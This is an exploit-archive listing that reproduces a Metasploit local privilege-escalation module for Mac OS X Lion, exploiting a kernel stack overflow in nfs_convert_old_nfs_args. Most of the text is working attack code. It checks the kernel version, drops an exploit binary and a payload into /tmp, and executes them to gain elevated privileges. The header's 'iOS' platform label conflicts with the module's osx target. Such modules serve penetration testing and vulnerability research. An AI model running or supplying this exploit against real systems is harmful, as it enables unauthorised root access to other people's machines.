#; Mac OS X NFS Mount Privilege Escalation Exploit

1. ==================================================
2. Full title Mac OS X NFS Mount Privilege Escalation Exploit
3. Date add 2014-04-26
4. Category local exploits
5. Platform iOS
6. Risk <font color="#FFBF00">Security Risk High</font>
7. Description This exploit leverage a stack overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size of a user-provided argument before copying it to the stack. As a result by passing a large size, a local user can overwrite the stack with arbitrary content. Mac OS X Lion Kernel versions equal to and below xnu-1699.32.7 except xnu-1699.24.8 are affected.
8. ==================================================
9.  
10. ##
11. # This module requires Metasploit: http//metasploit.com/download
12. # Current source: https://github.com/rapid7/metasploit-framework
13. ##
14.  
15. require 'msf/core'
16. require 'rex'
17.  
18. class Metasploit3 < Msf::Exploit::Local
19. Rank = NormalRanking
20.  
21. include Msf::Post::File
22. include Msf::Exploit::EXE
23. include Msf::Exploit::FileDropper
24.  
25. def initialize(info={})
26. super(update_info(info,
27. 'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit',
28. 'Description' => %q{
29. This exploit leverage a stack overflow vulnerability to escalate privileges.
30. The vulnerable function nfs_convert_old_nfs_args does not verify the size
31. of a user-provided argument before copying it to the stack. As a result by
32. passing a large size, a local user can overwrite the stack with arbitrary
33. content.
34.  
35. Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
36. },
37. 'License' => MSF_LICENSE,
38. 'Author' =>
39. [
40. 'Kenzley Alphonse', # discovery and a very well-written exploit
41. 'joev' # msf module
42. ],
43. 'References' =>
44. [
45. [ 'EDB', '32813' ]
46. ],
47. 'Platform' => 'osx',
48. 'Arch' => [ ARCH_X86_64 ],
49. 'SessionTypes' => [ 'shell', 'meterpreter' ],
50. 'Targets' => [
51. [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
52. {
53. 'Platform' => 'osx',
54. 'Arch' => ARCH_X86_64
55. }
56. ]
57. ],
58. 'DefaultTarget' => 0,
59. 'DisclosureDate' => 'Apr 11 2014'
60. ))
61. end
62.  
63. def check
64. if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
65. Exploit::CheckCode::Vulnerable
66. else
67. Exploit::CheckCode::Safe
68. end
69. end
70.  
71. def exploit
72. osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
73. file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
74. exploit = File.read(file)
75. pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
76. tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
77. payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
78.  
79. print_status "Writing temp file... #{tmpfile}"
80. write_file(tmpfile, exploit)
81. register_file_for_cleanup(tmpfile)
82.  
83. print_status "Writing payload file... #{payloadfile}"
84. write_file(payloadfile, pload)
85. register_file_for_cleanup(payloadfile)
86.  
87. print_status "Executing payload..."
88. cmd_exec("chmod +x #{tmpfile}")
89. cmd_exec("chmod +x #{payloadfile}")
90. cmd_exec("#{tmpfile} #{payloadfile}")
91. end
92.  
93. def xnu_ver
94. m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
95. m && m[1]
96. end
97.  
98. def ver_lt(a, b)
99. Gem::Version.new(a.gsub(/~.*?$/,'')) < Gem::Version.new(b.gsub(/~.*?$/,''))
100. end
101.  
102. end